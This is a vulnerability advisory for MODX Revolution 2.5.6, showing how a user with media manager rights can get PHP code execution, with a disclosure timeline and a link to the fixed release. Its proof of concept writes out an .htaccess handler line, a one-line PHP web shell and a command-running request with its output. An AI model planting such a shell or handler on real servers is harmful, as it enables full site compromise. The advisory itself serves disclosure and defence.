MODX Revolution 2.5.6 PHP code execution

Date

Information

Name:MODX Revolution 2.5.6
Software:MODX CMS
Homepage:https://modx.com
Vulnerability:PHP code execution
Prerequisites:attacker needs to be authenticated user with with media manager permission
Severity:high
CVE:NA

Description

User with media manager permissions can edit and upload files. This functionality can be used to execute PHP code on the server.

Proof of Concept

Attacker accesses the media browser to edit and uplaod files. Since the application prevents the attacker from uploading PHP files directly, she/he can still edit .htaccess file. This can be used to instruct the web-server to execute various files as PHP, leading to code execution on the server and site compromise.

Following scenario demonstrates the issue on Apache web-server.

Media Browser: http://victim.site/manager/?a=media/browser

Attacker edits or uploads a .htaccess file with the following content on the server:

AddHandler application/x-httpd-php .z

This instructs the Apache to execute .z files as PHP. Next, the attacker uploads a shell.z on the server and executes it.

<?php $r=$_REQUEST;if(isset($r['x'])) $r['x']($r['c']);

Attacker can execute PHP on the server by accessing the uploaded file directly: view-source:http://victim.site/shell.z?x=system&c=ls%20-lah

total 80K
drwxrwx--- 1 www-data www-data 4.0K Apr  2 23:56 .
drwxrwx--- 1 www-data www-data  12K Mar 31 17:54 ..
-rwxrwx--- 1 www-data www-data 3.4K Apr  4 23:57 .htaccess
drwxrwx--- 1 www-data www-data 4.0K Mar 30 23:33 assets
-rwxrwx--- 1 www-data www-data  285 Mar 31 16:52 config.core.php
drwxrwx--- 1 www-data www-data 4.0K Mar 28 09:00 connectors
drwxrwx--- 1 www-data www-data 4.0K Mar 30 23:33 core
-rwxrwx--- 1 www-data www-data 1.9K Mar 28 08:42 index.php
drwxrwx--- 1 www-data www-data 4.0K Mar 28 09:01 manager
-rwxrwx--- 1 www-data www-data   55 Apr  4 22:39 shell.z

Impact

Taking control over site's administrator or media manager account leads to full compromise, since it is possible to execute PHP. Any WCI (a.k.a XSS) vulnerability present in the MODX core or any of the third-party plugins can possibly be used to take control over the administrator's or media manager's session. This means, that a single WCI vulnerability could be used to execute PHP code and compromise the site.

Conclusion

Attacker with permissions or access to account to access media manager can execute PHP code on the server.

Following release has been published mitigating the issue: https://modx.com/blog/modx-revolution-2.5.7

Timeline

  • 01.04.2017 | me > developer     | vulnerability discovered
  • 03.04.2017 | me > developer     | sent the report to the developers
  • 13.04.2017 | developer > me     | acknowledged the finding
  • 21.04.2017 | developer > public | new version released
  • 01.05.2017 | me > public        | full disclosure